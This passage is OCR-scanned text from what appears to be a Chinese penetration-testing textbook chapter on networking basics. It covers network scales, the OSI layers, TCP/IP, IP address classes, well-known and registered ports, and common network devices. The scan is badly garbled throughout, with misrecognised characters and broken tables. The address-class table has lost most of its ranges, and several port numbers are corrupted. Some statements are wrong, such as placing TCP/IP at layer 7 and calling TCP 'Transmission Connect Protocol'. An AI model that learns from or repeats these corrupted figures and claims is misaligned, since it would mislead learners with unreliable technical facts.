位 置 部 署 ， 而 且 许多 渗透 测试 者 需要 使 用 的 工具 仅 在 Linux 上 可 用 。 
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连接 到 网 络 的 计算 机 大 致 可 以 分 为 两 种 类 型 : 服务 器 和 客户 机 。 服 务 器 是 通常 用 于 提 
供 资 源 的 那些 系统 ， 但 与 工作 站 不 同 ， 它 们 并 未 针对 人 类 的 直接 使 用 进行 优化 。 服 务 器 可 
以 提供 诸如 打印 和 传真 、 软 件 托管 、 文 件 存 储 和 共享 、 消 息 传 递 、 数 据 存 储 和 检索 、 网 络 
资源 的 完整 访问 控制 等 服务 。 男 一 种 类 型 的 系统 (工作 站 或 称 为 客 尸 机) 传统 上 也 称 为 果 面 
机 ， 并 且 通 第 有 一 个 人 类 用 户 ;， 利用 它们 与 网 络 进行 交互 。 传 统 上 ， 我 们 认为 工作 站 是 一 
台 由 主机 、 键 盘 、 显 示 器 、 鼠 标 组 成 的 台式 机 ， 或 是 一 台 具 有 集成 的 键盘 、 显 示 屏 和 触摸 
板 的 笔记 本 电脑 ， 但 随 独 平板 电脑 和 其 他 移动 计算 平台 的 兴起 ， 这 一 定义 也 及 生 了 变化 。 

网 络 可 按 规模 分 为 四 个 级 别 : 


个 人 局 域 网 (PAN) 
这 是 一 种 相对 很 小 的 网 络 ， 宪 盖 范 围 通 常 不 超过 30 英 尺 。 一 般 而 言 ， 这 种 类 型 的 网 络 
是 通过 使 用 蓝牙 无 线 技术 创建 的 。 


局 域 网 (LAN) 

这 种 级 别 的 网 络 履 盖 范 围 是 一 层 楼 或 是 一 栋 建 筑 物 或 办 公 室 中 的 房间 。 它 通 第 以 快速 
以 太 网 链 路 为 特征 。 

城 域 网 (MAN) 

这 种 系统 的 设计 用 于 履 盖 一 个 城市 规模 的 小 区 域 。 虽 然 此 类 方案 需要 花费 一 段 建 设 时 
间 才 能 正常 工作 ， 但 一 旦 建立 并 配置 完成 就 十 分 高 效 。 
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广域网 (WAN) 

最 后 ， 广 域 网 是 网 络 布局 中 的 巨 无 霸 ， 它 依赖 各 种 特殊 技术 ， 如 微波 、X 光 系统 ， 甚 
至 是 手机 。 因 为 这 种 类 型 的 网 络 建设 所 需 的 大 量 资金 和 技术 支持 ， 所 以 它 通 常 仅 在 大 型 组 
织 和 企业 中 存在 。 

在 任何 评估 任务 的 环境 中 ， 都 会 包含 一 种 或 多 种 上 述 网 络 类 型 ， 如 果 没 有 其 他 类 型 ， 
通常 至 少 会 有 一 个 LAN。 


2.2.1 OSI 模型 


开放 系统 互 连 (Open System Interconnection，OSD) 模 型 对 渗透 测试 工作 很 有 价值 。 虽 然 
OSI 模型 似乎 相当 陈旧 而 笨拙 ， 但 它 是 一 种 “必要 之 恶 ”， 因 此 不 包含 该 模型 概述 的 网 络 
或 网 络 设备 介绍 都 是 不 完整 的 。 

OSI 模型 最 初 是 在 20 世 纪 70 年 代 作 为 一 个 所 有 的 网 络 技术 都 将 围绕 其 构建 的 统一 模型 
设计 的 。 早 期 的 各 种 技术 公司 和 标准 委员 会 等 网 络 业 界 参与 者 意识 到 : 如 果 没 有 一 套 通用 
的 规则 和 标准 ， 未 来 的 网 络 环境 将 会 一 团 混 乱 。 多 年 来 OSI 模型 已 有 所 演进 ， 但 其 原始 目 
的 仍然 基本 没有 改变 。 因 此 ， 其 后 的 几 代 网 络 技术 互 操 作 性 愈 来 愈 好 ， 也 愈 来 合成 功 。 

虽然 该 模型 现在 看 来 似乎 过 于 复杂 ， 但 是 在 本 书后 续 关 于 攻击 、 防 御 和 基础 设施 的 讨 
论 中 确实 有 价值 ， 因 此 应 重点 关注 。 该 模型 是 一 个 通用 框架 ， 可 以 围绕 其 进行 网 络 协议 、 
软件 和 系统 的 设计 。 可 以 认为 OSI 模型 是 一 套 一 般 性 的 指导 原则 ， 是 一 个 可 提高 系统 兼容 
性 和 逻辑 流量 的 通用 指南 。 从 外 行人 角度 来 看 ， 这 意味 着 已 经 建立 了 一 尽 所 有 人 都 同意 遵 
循 的 共同 的 规则 ， 而 作为 一 名 渗透 测试 者 ， 这 有 助 于 你 更 好 地 了 解 网 络 运 行 机 理 。 

在 学 习 各 层 的 功能 时 ， 请 记 住 ， 本 书 在 概念 上 按照 数据 的 流 回 进行 介绍 。 换 言 之 ， 每 
层 都 连接 到 下 一 层 。 在 后 续 的 更 高 级 数据 分 析 中 ， 将 证 明 该 概念 具有 参考 价值 。 

OSI 模型 的 各 层级 如 下 : 


第 1 层 / 物 理 层 

物理 层 由 物理 介质 和 构建 网 络 基础 设施 的 设备 组 成 。 它 与 实际 的 布线 和 连接 (如 连 
接 器 类 型 ) 有 关 。 请 注意 ， 该 层 还 包括 光 和 射线 ， 这 将 涉及 诸如 光纤 和 微波 传输 设备 等 介 
质 。 设 备 中 则 还 包括 集 线 占 、 调 制 解 调 器 和 中 继 器 。 


第 2 层 /数据 链 路 层 

数据 链 路 层 用 于 确保 传输 数据 准确 无 误 。 在 这 一 层 ， 数 据 包含 在 帧 中 。 此 层 中 包括 了 
介质 访问 控制 和 链 路 建立 等 功能 。 此 层 包 含 基本 协议 ， 如 本 书 重点 关注 的 以 太 网 802.3 协 
议和 Wi-Fi 的 802.11 协 议 。 


第 3 层 / 网 络 层 
网 络 层 根据 协议 定义 中 的 不 同 因素 决 定数 据 包 的 传输 路 径 。 该 层 中 包括 用 于 数据 包 路 
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由 的 卫 寻 址 机 制 。 


第 4 层 / 传 输 层 
传输 层 的 关注 对 象 正 如 其 名 ， 它 确保 数据 的 传输 或 有 送 成 功 。 此 层 的 功能 包括 错误 检 
查 操作 以 及 保持 数据 消息 的 传输 顺序 等 。 


第 5 后 /会 语 后 

会 话 层 识别 不 同 网 络 实体 之 间 已 建立 的 系统 会 话 。 例 如 ， 当 远程 访问 系统 时 ， 将 创建 
一 个 计算 机 和 远程 系统 之 间 的 会 话 。 会 话 层 监视 和 控制 这 样 的 连接 ， 从 而 允许 建立 多 个 独 
立 连接 ， 并 可 链接 到 多 种 不 同 资源 。 


第 6 层 / 表 示 层 
表示 层 为 下 一 个 接收 层 提供 其 可 以 理解 的 数据 的 翻译 。 数 据 流 量 以 接收 者 可 以 使 用 的 
格式 “表示 ”， 并 可 通过 诸如 SSL 之 类 的 协议 进行 加 密 。 


第 7 层 /应 用 层 

应 用 层 的 功能 是 作为 一 个 用 户 平 台 ， 系 统 内 的 用 户 和 软件 进程 可 以 在 其 上 运行 并 访问 
网 络 资源 。 日 第 使 用 的 应 用 程序 和 软件 套件 都 位 于 该 层 。 

记 住 各 层 的 顺序 及 其 内 容 可 能 是 目前 的 难点 。 各 层 的 顺序 如 表 2.1 所 示 。 

表 2.1 各 个 OSI 层 和 项 的 布局 

层级 举例 
应 用 层 终端 用 户 应 用 程序 使 用 的 服务 | SMTP、HTTP、POP3、IMAP 
表示 层 0 以 便 用 户 胡 看 ;| jpEG、GIF、TIFF、HTTPS、SSL、 TLS 
会 话 层 在 两 台 主 机 间 建 立 /终止 连接 [RPC、SQL、NetBIOS、PPTP 
传输 层 4 负责 传输 协议 和 错误 处 理 TCP、 UDP 


网 络 层 3 ”| 从 数据 包 中 读 取 包 地 址 IP、ICMP、 路 由 器 、 三 层 交 换 机 
数据 链 路 层 。 |2 ”| 从 数据 包 中 读 取 MAC 地 址 。 |PPP、SLIP、 交 换 机 
物理 层 1 “| 发 送 数 据 至 物理 线路 物理 连接 、 集 线 器 、 网 卡 、 线 缆 


如 果 记 住 这 些 层 的 组 合 有 困难 ， 可 以 尝试 使 用 助 记 语 。 有 两 种 著名 的 记忆 该 模型 的 
方式 : 
“所 有 人 似乎 都 需要 数据 处 理 (All People Seem to Need Data Processinge)” 使 用 各 层 的 
首 个 字母 作为 本 句子 中 各 个 英文 单词 的 第 一 个 字母 。 
@ Application: 应 用 层 
@ Presentation: 表示 层 
@ Session: 会 话 层 


@ Transport: 传输 层 
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@ Network: 网 络 层 
@ Data Link: 数据 链 路 层 
@ Physical: 物理 层 
“请 不 要 教 傻瓜 缩 略语 (Please Do Not Teach Stupid People Acronyms)” 是 一 句 有 趣 的 
助 记 语 ， 但 笔者 发 现 ， 由 于 这 人 句 话 的 幽默 性 ， 笔 者 的 学 生 们 记 住 这 个 模型 旱 不 费力 。 这 一 
助 记 语 以 相反 的 顺序 排列 层级 ， 从 最 底层 开始 。 
@ Physical: 物理 层 
Data Link: 数据 链 路 层 
Network: 了 网络 层 
Transport: 传输 层 
Session: 会 话 层 
Presentation: 表示 层 
Application: 应 用 层 
不 管用 哪 种 方法 ， 请 记 住 这 些 层次 与 OSI 模 型 。 


2.2.2 TCPIIP 协议 族 


传输 控制 协议 /互联 网 协议 (Transmission Control Protocol/Internet Protocol，TCP/IP) 是 
一 套 网 络 协议 族 ， 使 用 其 可 在 两 台 或 多 台 主 机 间 交 换 信 息 。 访 协议 族 最 初 开 发 用 于 美国 国 
防 部 下 属 的 国防 数据 网 络 (Defense Data Network)， 而 现在 它 已 在 全 球 被 采用 为 网 络 标准 。 

虽然 OSI 模 型 没有 直接 孕育 出 TCP/IP 协 议 ， 但 有 一 个 标准 在 设计 人 员 脑 海中 的 确 为 指 
叶 协 议 开发 做 了 很 大 贡献 。 在 将 TCP/IP 协 议 族 与 OSI 模 型 进行 比较 时 ， 很 容易 发 现 TCP/IP 
协议 族 的 组 件 可 映射 到 OSI 模 型 的 一 个 或 多 个 层次 。 

传输 连接 协议 (Transmission Connect Protocol，TCP) 和 用 户 数 据 报 协 议 (User Datagram 
Protocol，UDP) 是 该 协议 族 的 两 个 核心 组 件 。 基 于 其 工作 方式 ，TCP 通 常 被 视 为 一 种 面 问 
连接 的 协议 。 在 TCP/IP 中 ， 规 则 规定 将 从 一 个 位 置 发 送 到 男 一 个 位 置 的 信息 分 割 成 称 为 数 
据 包 (packet) 的 片段 。 这 些 数 据 包 不 仅 包 含 一 段 原始 传输 数据 ， 还 包含 一 个 数据 包头 和 包 
尾 ， 用 于 充当 地 址 标签 和 信息 描述 符 。TCP 建 立 连接 ， 然 后 验证 每 条 消 轧 (数据 包 )， 以 确 
保 数 据 包 以 正确 的 顺序 到 达 其 目标 位 置 。 为 了 实现 这 一 目的 ，TCP 使 用 了 称 为 三 次 握手 的 
机 制 |。 

三 次 握手 是 TCP 用 于 两 节操 之 间 连 接 初 始 化 的 过 程 。 它 以 一 个 SYN 报 文 开 始 。SYN 报 
文通 过 告知 接收 端 (当然 是 通过 TCP) 另 一 个 系统 希望 得 到 它 的 注意 来 局 动 握手 过 程 ， 以 传 
输 信息 。 而 后 接收 端 系统 利用 SYN-ACK 啊 应 报 文 回复 发 送 端 系统 。SYN-ACK 啊 应 报 文 是 
对 原始 SYN 报 文 的 接收 的 确认 。 在 初始 发 送 方 接收 到 SYN-ACK 后 ， 会 用 ACK 数 据 报 文 进 
行 响 应 ， 以 确认 它 已 经 接收 到 SYN-ACK 并 准备 好 通过 TCP 进 行 通信 。 

除了 三 次 握手 之 外 ，TCP 还 为 发 送 的 每 个 数据 包 提供 了 序列 号 。 这 些 序列 号 告诉 接收 


端 以 何 种 顺序 重新 组 合 数 据 包 以 获得 原始 传输 数据 。 现 在 无 须 过 度 关 注 序列 号 ， 后 文中 将 
对 它们 进行 详细 讲解 。 

与 TCP 不 同 ，UDP 几 乎 没有 为 确保 信息 到 达 目 的 地 及 其 正确 性 提供 保护 措施 。UDP 协 
议 基 本 上 假设 如 果 需 要 错误 检查 或 确认 ， 应 该 使 用 TCP 协 议 ， 或 者 由 应 用 程序 自行 处 理 错 
误 检 查 和 通信 格式 问题 。 

UDP 被 视 为 一 种 无 状态 (或 无 连接 ) 协 议 。 无 状态 意味 着 协议 将 每 个 信息 请 求 视 为 该 请 
求 自身 的 独立 事务 。 虽 然 这 样 做 似乎 是 资源 密集 型 的 ， 实 际 情况 则 恰恰 相反 ， 因 为 系统 不 
再 需要 跟踪 正在 进行 的 会 话 ， 消 耗 的 内 存 空间 较 少 。 

该 协议 族 中 的 另 一 协议 是 互联 网 协议 (Internet Protocol，IP)。 卫 协议 负责 数据 包 的 格 
式 化 和 寻 址 。IP 协 议和 更 高 层 的 协议 共同 工作 ,例如 上 文 所 述 负 责 在 两 点 之 间 建 立 连接 的 
TCP 人 协议 。 

IP 协 议 与 邮局 非常 相像 ， 它 可 以 使 用 发 件 人 和 收 件 人 的 地 址 来 寻 址 包 于 ( 即 这 里 的 数 
据 包 )。 由 于 将 该 信息 印 在 数据 包 上 ， 因 此 它 可 以 由 传输 端 发 送 到 接收 端 ， 而 无 须 由 数据 
包 考 虑 其 间 的 链 路 。 


TCP/P 位 于 第 7 层 
在 OSI 模型 中 ，TCPTP 位 于 第 7 层 (应 用 层 )。 软 件 应 用 程序 使 用 应 用 层 访问 网 络 资 
源 和 服务 。 可 将 第 7 层 想 象 为 家 中 的 电源 插座 。 如 果 家 电 需 要 电力 ， 只 需要 将 其 插入 
插座 即 可 获得 电源 ; 如 果 不 需 要 ， 则 无 须 插入 。 软 件 应 用 程序 与 之 类 似 。 如 果 需 要 
访问 网 络 ， 它 会 “插入 ”第 7 层 。 如 有 果 不 需 要 ， 则 无 须 关 心 此 问题 。 对 于 本 书 而 言 
很 多 地 方 涉及 第 7 层 。 
一 些 服务 运行 在 该 屋 ， 当 应 用 软件 需要 访问 网 络 时 可 以 使 用 这 些 服 务 。 这 些 服 务 
就 是 应 用 程序 。 例 子 之 一 是 Web 浏 览 硕 ， 如 Google 的 Chrome。 如 果 用 户 打 开 浏 览 磊 并 
访问 网 站 ， 他 们 将 使 用 位 于 此 层 的 超 文本 传输 协议 (Hypertext Transfer Protocol，HTTP) 
服务 。 如 果 使 用 电子 邮件 应 用 或 其 他 软件 包 ， 即 使 协议 不 同 ， 过 程 也 同样 如 此 。 
数 十 种 不 同 的 应 用 层 协 议 支 持 此 层 的 各 种 功能 。 其 中 最 流行 的 一 些 包 括 HTTP、 
FIP、SMTP、DHCP、NFS、Telnet、SNMP、POP3、NNTP 和 IRC 等 协议 。 


2.2.3 IP 地 址 


IP 地 址 是 TCP/IP 的 一 部 分 ， 它 是 分 配给 连接 到 IP 网 络 的 设备 (也 称 为 主机 ) 的 唯一 数 
字 地 址 。 连 接 到 网 络 的 每 台 设 备 (例如 台式 计算 机 、 笔 记 本 电脑 、 服 务 器 、 扫 描 仪 、 打 印 
机 、 调 制 解 调 器 、 路 由 器 、 智 能 手机 和 平板 电脑 ) 均 会 被 分 配 一 个 IP 地 址 ， 并 且 通 过 IP 网 络 
传输 的 每 个 IP 数 据 包 均 包 含 一 个 源 IP 地 址 和 一 个 目的 人 P 地 址 。 一 些 IP 地 址 的 例子 如 下 : 

@ 192.168.1.1 

@ 10.15.1.15 
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@ 169.254.20.16 

上 述 每 一 个 地 址 都 被 认为 是 有 效 的 IP 地 址 ， 在 各 自 的 使 用 环境 中 均 合法 。 

IP 协 议 有 两 个 版 本 : IPv4 和 IPv6。 本 书 主要 关注 IPv4， 但 这 并 不 意味 着 读者 无 须 学 习 
IPV6。 如 果 要 从 事 在 安全 方面 关注 较 少 的 I 职业 ， 就 需要 在 某 个 时 候 学 习 新 的 他 协议 版 本 。 


练习 2.1: 在 Windows 操作 系统 中 确定 IP 地 址 

确定 下 地 址 是 一 项 重要 技能 。 以 下 步骤 已 在 Windows 7 和 Windows 8 上 经 过 测试 。 

(1) 要 碍 看 计算 机 的 卫 地 址 ， 单 击 Start 荣 单 并 单 击 Control Panel， 以 打开 Network 
Connections 寞 男 。 

(2) 在 搜索 框 中 输入 adapter， 接 着 在 Network and Sharing Center 中 单 击 View 
Network Connectionso 

(3) 选择 一 个 活动 的 网 络 连 接 ， 在 工具 栏 中 单 击 View Status Of This Connection 

(4) 单 击 Details。 

PE PE A ， 紧 人 BIPv4 Address。IP 地 址 的 查询 结果 如 图 2.5 所 示 。 
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图 2.5 ”客户 端的 下 地址 


此 外 ， 也 可 以 通过 命令 行 来 进行 操作 : 
(1) 单 击 Start | All Programs (或 等 效 项 )。 
(2) 单 击 Accessories | Command Prompt。 
(3) 在 命令 提示 符 中 输入 ipconfig。 
ipconfig 命 令 的 结果 如 图 2.6 所 示 。 
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图 2.6 ipconfg 命 令 的 结果 


在 Linux、Unix 和 Mac OS X 系 统 上 ， 则 需要 打开 终端 窗口 或 控制 台 并 输入 命令 
lifconfig。 


IP 地 址 不 只 是 看 起 来 那样 一 一 这 就 是 说 ， 它 们 以 所 谓 的 点 分 十 进 制 (dotted decimal) 格 
式 编 写 。 该 格式 由 小 数 点 分 隔 的 四 组 数字 组 成 ， 如 210.168.69.2。 该 地 址 表示 主机 在 给 定 
网 络 上 的 位 置 ， 其 中 部 分 地 址 表示 网 络 ， 部 分 地 址 表示 主机 。 

IP 寻 址 系统 (Pv4) 使 用 一 个 32 位 数字 ， 该 数字 被 划分 为 网 络 和 主机 (客户 端 、 服 务 器 等 ) 

下 面 介 绍 网 络 和 主机 的 关系 。 首 先 ， 想 象 一 个 不 使 用 “网 络 - 主 机 ”形式 的 地 址 : 
把 它们 想象 成 街道 和 门牌 地 址 。 单 独 知道 街道 或 门牌 地 址 本 身 并 没有 什么 用 一 一 例如 ， 
“441 写 ”或 “McInnis 大 道 ” 本 号 是 无 意义 的 。 但 是 ，“McInnis 大 道 441 号 ” 则 是 一 个 特 


对 于 本 书 而 言 ， 在 此 将 分 析 A、B、C 三 类 网 络 。 基 于 不 同 数 字段 的 划分 ，IP 地 址 可 以 
是 A 类 、B 类 或 C 类 。 使 用 最 广泛 的 是 C 类 。 目 前 有 超过 两 百 万 个 C 类 地 址 正在 使 用 ， 这 些 
地 址 通常 是 批量 分 配给 Internet 服 务 提供 商 ISP)。 最 少 的 是 A 类 网 络 ， 它 们 是 为 政府 机 构 和 
大 型 公司 保留 的 。 表 2.2 列 出 了 不 同类 别 的 地 址 。 

表 2.2 1IP 地 址 类 别 


类 别 范围 最 大 主机 数量 子 网 掩 码 
A 255.0.0.0 
. EY 
和 


128~191 16 383 65 534 255.255.0.0 
192~223 2 097 151 255.255.255.0 
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1. 公 网 和 内 网 地 址 


并 非 所 有 IP 地 址 都 “ 生 而 平等 ”。 公 网 IP 地 址 是 任意 一 个 具备 Internet 上 唯一 性 的 地 
址 ， 而 内 网 IP 地 址 只 需要 在 任意 一 个 独立 的 网 络 中 唯一 即 可 。 使 用 内 网 PF， 可 以 同 网 络 A 
中 的 计算 机 分 配 与 网 络 B 或 是 干 干 万 万 个 其 他 网 络 中 的 计算 机 相同 的 IP 地 址 。 


2. 静态 和 动态 |P 


通 剃 会 为 网 络 基础 设施 设备 (如 服务 器 、 路 由 器 和 防火 场 ) 分 配 永久 的 静态 卫 地 址 。 客 
户 机 也 可 由 网 络 管理 员 分 配 静 态 耳 地 址 ， 但 通 音 是 由 使 用 动态 主机 配置 协议 (DHCP) 的 软 
件 为 其 目 动 分 配 临 时 动态 卫 地 址 。 电 缆 /DSL 调制 解 调 器 通 弟 使 用 动态 了 地址 ， 每 当 调 制 解 
调 句 重 局 时 ， 就 会 为 其 分 配 新 的 卫 地 址 。 


3. IP 子 网 划分 


接 下 来 介绍 划分 子 网 。 到 目前 为 止 ， 通 过 OSI 七 层 模型 和 IP 地 址 的 简介 ， 我 们 已 经 建 
立 了 相关 基本 概念 。 让 我 们 深入 网 络 层 ， 学 习 IP 地 址 分 配 和 子 网 划分 。 此 处 的 目标 是 刷新 
你 的 记忆 ， 让 大 脑 思考 回 到 网 络 设 计 及 其 底层 的 细微 差别 。 为 什么 要 划分 子 网 ?因为 如 果 
可 以 划分 子 网 ， 即 可 锁定 一 个 目标 ， 从 而 知晓 如 何 使 用 最 有 效 的 方式 退 寻 该 目标 。 在 网 络 
上 漫 无 目的 地 凑 巡 不 仅 浪 费时 间 和 精力 ， 也 会 增加 曝光 的 可 能 性 ， 而 这 并 非 渗透 测试 者 
所 和 欲 。 

子 网 划分 是 将 网 络 地 址 空间 逻辑 分 解 为 逐 级 变 小 的 子 网 的 过 程 。 在 将 地 址 空间 分 解 
成 较 小 的 子 网 时 ， 要 根据 网 络 的 需求 确定 网 络 和 主机 使 用 的 位 数 。 现 在 网 络 位 数 和 主机 位 
数 由 子 网 掩 码 操纵 ， 如 果 具 有 子 网 掩 码 及 其 处 理 地 址 空间 的 相关 用 途 的 基础 知识 ， 就 可 以 
了 解 到 为 何 仅 靠 知道 几 个 JP 地址 ， 就 可 以 提供 有 关 一 个 组 织 网 络 如 何 布局 的 深入 线索 。 例 
如 ， 知 道 一 个 内 部 IP 地 址 就 可 以 让 黑客 了 解 公司 的 地 址 分 配方 案 。 


4. TCP/IP 痊 口 


另 一 个 需要 讨论 的 问题 是 端口 。 端 口 允许 计算 机 发 送 数 据 ， 同 时 按 类 别 识别 该 数据 。 
这 意味 着 使 用 的 每 个 常用 端口 都 与 某 个 特定 协议 或 特定 应 用 程序 相对 应 。 例 如 ， 通 过 21 
端口 发 送 数据 是 向 接收 系统 表明 ， 其 接收 的 该 流量 是 FTP 请 求 ， 因 为 来 自 对 应 的 端口 。 此 
外 ， 由 于 识别 了 流量 来 源 端 口 ， 来 自 最 初 所 查询 系统 的 响应 最 终 可 被 正确 处 理 。 这 同样 适 
用 于 网 络 流量 和 邮件 流量 等 。 

为 了 帮助 更 好 地 理解 端口 以 及 端口 与 卫 地 址 的 关系 ， 现 在 换个 思考 角度 。IP 地 址 和 端 
口 是 共 同 使 用 的 ， 两 者 通常 以 如 下 形式 并 用 

192.108.1.10:80 

在 本 例 中 ， 冒 号 之 前 的 部 分 是 指 某 台 特定 的 计算 机 ， 其 后 则 是 端口 。 二 者 组 合 在 一 起 
形成 所 谓 的 “ 套 接 字 ”。 可 将 IP 地 址 想象 为 银行 或 1SP 的 电话 号 码 ， 而 端口 则 与 电话 分 机 
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相同 。 某 公司 可 以 有 一 个 总 机 号 码 ， 其 员工 有 一 些 分 机 ， 这 就 是 端口 的 工作 方式 。 一 个 系 
统 可 以 有 一 个 IP 地 址 ， 其 上 关联 了 大 量 的 端口 。 
这 些 端口 及 其 相关 协议 和 应 用 程序 的 知识 对 于 扫描 系统 的 特定 漏洞 非常 重要 。 相 关 端 
口 列 表 如 下 : 
知名 端口 它们 是 日 常 操作 中 最 常见 的 端口 ， 端 口号 范围 为 0~1023。 读 者 应 该 已 经 熟 
悉 这 个 范围 中 初始 段 的 大 部 分 端口 号 。 应 了 解 的 端口 列表 如 表 2.3 所 示 。 
表 2.3 ”知名 端口 


端口 用 途 
20 和 21 FTP 
22 SSH 
23 Telnet 
25 SMTP 
42 WINS 
3 了 DNS 
80 和 8080 HTIP 
88 Kerberos 
110 POP3 
111 Portmapper—— Linux 
123 NTP 
13» RPC-DCOM 
139 SMB 
143 IMAP 
161 和 162 SNMP 
389 LDAP 
445 CIFS 
S14 Syslog 
636 安全 LDAP 


注册 端口 此 类 端口 的 端口 号 范围 为 1024~49150。 注 册 端 口 是 已 由 在 用 户 当前 权限 之 
外 运行 的 其 他 应 用 程序 标识 为 可 用 的 端口 。 例 如 端口 1512， 该 端口 用 于 文 持 WINS 流 量 。 
表 2.4 列 出 了 有 价值 的 注册 端口 。 
表 2.4 有 价值 的 注册 病 口 


阐 口 用 途 
1080 Socks5 
1241 Nessus 服 务 器 
1433 和 1434 SQL 服务 器 
1494 和 2598 Citrix 应 用 程序 
1521 Oracle 监 听 程 序 
2512 和 2513 Citrix 管 理 程序 
3389 RDP 
6662-6667 IRC 


动态 端口 此 类 端口 的 范围 为 49152~65535。 它 们 是 可 用 于 由 应 用 程序 发 起 的 任何 TCP 或 
UDP 请 求 的 “空闲 ”端口 ， 它 们 用 于 文 持 尚 未 在 注册 端口 范围 内 正式 注册 的 应 用 程序 流量 。 
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2.2.5 网 络 设备 


网 络 内 部 包含 各 种 提供 附加 功能 的 设备 或 装置 ， 例 如 控制 流量 等 。 本 市 将 讨论 现代 网 
络 中 可 能 存在 的 常见 网 络 设备 。 在 此 只 是 对 这 些 设 备 做 一 个 基本 概述 ， 在 本 书后 续 章 节 中 
将 进一步 细 化 说 明 。 


1. 路 由 器 


路 由 器 的 主要 功能 是 根据 网 络 地 址 将 数据 包 转 发 到 适当 的 位 置 。 由 于 路 由 器 在 网 络 层 
转发 流量 ， 因 此 将 其 视 为 第 3 层 设备 。 在 讨论 路 由 器 时 ， 也 要 讨论 卫 等 协议 ， 也 就 是 讨论 
IP 寻 址 机 制 。 

路 由 器 也 用 作 不 同类 型 网 络 间 的 网 天 。 例 如 ， 两 个 网 络 (假设 为 两 个 不 同 的 IP 段 ) 需 要 
通过 路 由 器 连接 。 或 者 可 能 的 另 一 种 情况 是 ， 互 连 的 各 个 网 络 上 使 用 的 协议 无 法 被 另 一 个 
网 络 解 析 一 一 例如 IPv4 与 IPv6 互 连 的 情况 。 路 由 器 为 此 类 鸿沟 架设 桥梁 ， 使 得 不 同 网 络 上 
的 不 同 协议 得 以 进行 通信 。 

大 多 数 现代 路 由 器 实现 了 所 谓 的 网 络 地 址 转换 (Network Address Translation，NAT)。 
这 是 一 种 使 多 个 内 部 网 络 客 户 端 能 够 使 用 单个 公 网 IP 地 址 访问 Intemet 的 技术 。 路 由 器 至 少 
需要 两 个 接口 : 一 个 用 于 Internet， 男 一 个 用 于 内 部 网 络 。 外 部 连接 (或 称 公 网 侧 ) 从 ISP 租 
用 公 网 PP 地址。 路 由 器 的 内 部 连接 到 本 地 内 部 网 ， 其 中 包含 所 有 内 部 管理 的 资源 。 当 内 部 
客户 端 请 求 外 部 资源 时 ， 路 由 器 接收 该 流量 并 将 其 发 送 到 公共 IP 的 公共 端 。 此 过 程 保护 内 
部 客户 端的 IP 地 址 ， 并 通过 同一 个 公共 IP 转 发 所 有 出 站 请 求 。 


2. 交换 机 


交换 机 根据 目标 计算 机 或 设备 的 硬件 /物理 地 址 处 理 和 传送 数据 。 硬 件 地 址 也 称 为 介 
质 访问 控制 (Media Access Control，MAC) 地 址 ， 是 在 网 卡 (Network Interface Card，NIC) 制 
造 时 写 入 其 中 的 永久 性 标识 符 。 

MAC 地 址 共 48 位 ， 分 为 6 对 十 六 进 制 值 ， 例 如 : 

c0-cb-38-ad-2b-c4 

MAC 的 前 半 部 分 指明 网 卡 制造 两， 称 为 组 织 唯 一 标识 从 (Organizationally Unique 
Identiier，OUT)。 因 此 在 上 面 的 例子 中 ，c0-cb-38 用 于 标识 供应 两 ，ad-2b-c4 用 于 标识 设备 
或 NIC 本 身 。 

现在 我 们 不 再 继续 纠缠 这 些 细 节 。 交 换 机 被 视 为 第 2 层 设 备 ， 因 为 它们 在 第 3 层 路 由 器 
功能 的 下 一 级 运行 。 网 络 层 包 含有 所 有 IP 寻 址 操作 ; 第 2 层 严格 地 仅 处 理 MAC 地 址 。 第 3 层 
处 理 数 据 包 ， 而 第 2 层 处 理 LAN 的 帧 。 

回 到 前 面 的 主题 ， 让 我 们 讨论 广播 域 和 冲突 域 ， 因 为 在 对 网 络 进行 调查 时 该 概念 会 直 
接 影响 到 你 的 一 些 操作 。 简 而 言 之 ， 广 播 域 是 一 种 环境 ， 在 该 环境 中 通过 线路 发 送 的 流量 


将 广播 到 连接 到 该 网 络 的 所 有 主机 或 节点 。 例 如 ，ARP 请 求 是 向 网 络 广播 的 用 于 将 IP 地 址 
解析 为 硬件 地 址 的 请 求 。 

冲突 域 是 其 中 流量 可 能 与 其 他 流量 相 冲 突 的 网 段 。 在 冲突 域 中 ， 发 送 的 数据 将 不 会 广 
播 到 所 有 附加 的 节点 ， 但 可 能 与 其 他 流量 发 生 碰撞 。 


3. 代理 服务 兹 


你 可 能 已 经 体验 过 代理 服务 器 业务 一 一 你 的 工作 场所 的 浏览 器 可 能 必须 直接 指向 一 台 
代理 服务 器 ， 才 能 访问 外 部 资源 (如 网 站 )。 实 施 这 种 解决 方案 有 多 种 原因 。 应 用 代理 服务 
器 的 好 处 之 一 是 可 以 保护 内 部 客户 端 系统 。 代 理 服务 器 作为 内 部 网 络 客户 端 系统 与 Intermnet 
之 间 的 中 介 ， 成 为 与 外 界 联系 的 窗口 。 这 样 可 以 防止 客户 端 系统 直接 与 外 部 来 源 通信 ， 从 
而 降低 了 风险 。 另 外 ， 作 为 中 间 人 ， 代 理 服务 器 具备 保护 其 客户 端的 能 力 ， 换 言 之， 代理 
可 以 按 内 容 过 滤 流量 。 这 意味 着 代理 在 应 用 层 (第 7 层 ) 运 行 。 代 理 可 以 过 滤 流 量 请 求 并 在 
一 个 相当 详细 的 级 别 上 验证 合法 流量 ， 这 对 于 较 低级 别 的 防火 墙 有 很 大 的 帮助 。 这 样 ， 当 
用 户 尝试 浏览 一 个 被 阻止 的 站 点 时 ， 如 果 代 理 中 设置 了 阻止 该 请 求 的 过 滤器 ， 请 求 将 被 彻 
底 拒绝 。 代 理 还 可 通过 缓存 经 常 访问 的 站 点 和 资源 加 快 浏览 速度 。 缓 存 站 点 可 以 直接 提供 
给 本 地 客户 请 求 ， 这 远 快 于 从 实际 Web 资 源 读 取 数 据 的 速度 。 


4. 防火 墙 


下 面 继续 介绍 防火 墙 类 设备 ， 它 们 主要 可 分 为 两 大 类 : 

包 过 滤 包 过 滤 防 火 墙 基本 上 通过 检查 数据 包头 信息 确定 流量 是 否 合法 。 它 们 使 用 基 
于 头 部 的 信息 (例如 IP 地 址 和 站 口 的 判定 规则 ) 确 定 是 允许 还 是 拒绝 数据 包 进 入 。 

有 状态 包 过 滤 有 状态 防火 墙根 据 发 起 流量 的 连接 的 “状态 ”确定 流量 的 合法 性 。 例 
如 ， 如 果 在 客户 端 机 器 和 Web 服 务 器 之 间 建 立 了 一 个 合法 连接 ， 则 有 状态 防火 场 将 参考 该 
连接 的 状态 表 ， 以 验证 来 自 该 连接 的 流量 是 否 已 经 审查 且 合 法 。 


5. IPS 和 IDS 


